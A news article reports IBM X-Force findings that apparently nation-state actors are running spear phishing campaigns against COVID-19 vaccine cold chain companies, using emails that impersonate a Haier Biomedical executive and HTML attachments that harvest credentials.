Share this article on:
The global COVID-19 vaccine cold chain continues to be targeted advanced persistent threat groups, according to an updated report from IBM Security X-Force. X-Force researchers previously published a report in December 2020 warning that cyber adversaries were targeting the COVID-19 cold chain to gain access to vaccine data and attacks continue to pose a major threat to vaccine distribution and storage.
There are currently more than 350 logistics partners that are part of the cold chain and are involved in the delivery and storage of vaccines at low temperatures. Since the initial report was published on cold chain phishing attacks, IBM X-Force researchers have identified a further 50 email message files tied to spear phishing campaigns, which have targeted 44 companies in 14 countries throughout Europe, the Americas, Africa, and Asia.
The companies being targeted underpin the transport, warehousing, storage, and distribution of COVID-19 vaccines, with the most targeted organizations involved in transportation, IT and electronics, and healthcare such companies in biomedical research, medical manufacturing, and pharmaceutical and hygiene services.
Threat actors, believed to be backed by nation states, have expanded their campaigns and are using spear phishing emails to steal credentials of CEOs, global sales officers, purchasing managers, HR officers, heads of plant engineering and others to gain privileged insight into national Advance Market Commitment (AMC) negotiations related to the procurement of vaccines, time tables for distribution, information on the passage of vaccines through nations and territories, export controls and international property rights, World Trade Organization (WTO) trade facilitation agreements, technical vaccine information, and other sensitive data.
The threat group behind this campaign appears to have an in depth understanding of the vaccine cold chain. The emails used in the spear phishing campaign impersonate an executive from the Chinese biomedical company, Haier Biomedical, which is the world’s only complete cold chain provider.
The emails request price quotations for service contracts regarding the Cold Chain Equipment Optimization Platform (CCEOP) program and reference products such as a solar-powered vaccine refrigerator and ice-lined refrigerator from the Haier Biomedical product line. The emails also mention organizations involved in petrochemical production and the manufacturing of solar panels that aligns with those products, and the language used in the email reflects the educational background of the sender that is spoofed in the signature block.
The emails have malicious HTML attachments which are opened locally, with the user requested to provide their credentials to view the file. If credentials are entered, they are captured and exfiltrated to the attackers’ command and control server.
“While our previous reporting featured direct targeting of supranational organizations, the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat,” wrote the researchers.
With vaccine nationalism and global competition related to access to vaccines, attacks that disrupt the cold chain were inevitable. While the researchers have not been able to attribute the campaign to any threat group, there is a strong likelihood that this is a nation state operation.
If the cold chain is disrupted it could result in delays delivering the vaccines or could disrupt the conditions required for safe vaccine transport and storage, which could render the vaccines unsafe or useless. IBM has published Indicators of Compromise in its report to help organizations in the COVID-19 cold chain protect against attacks.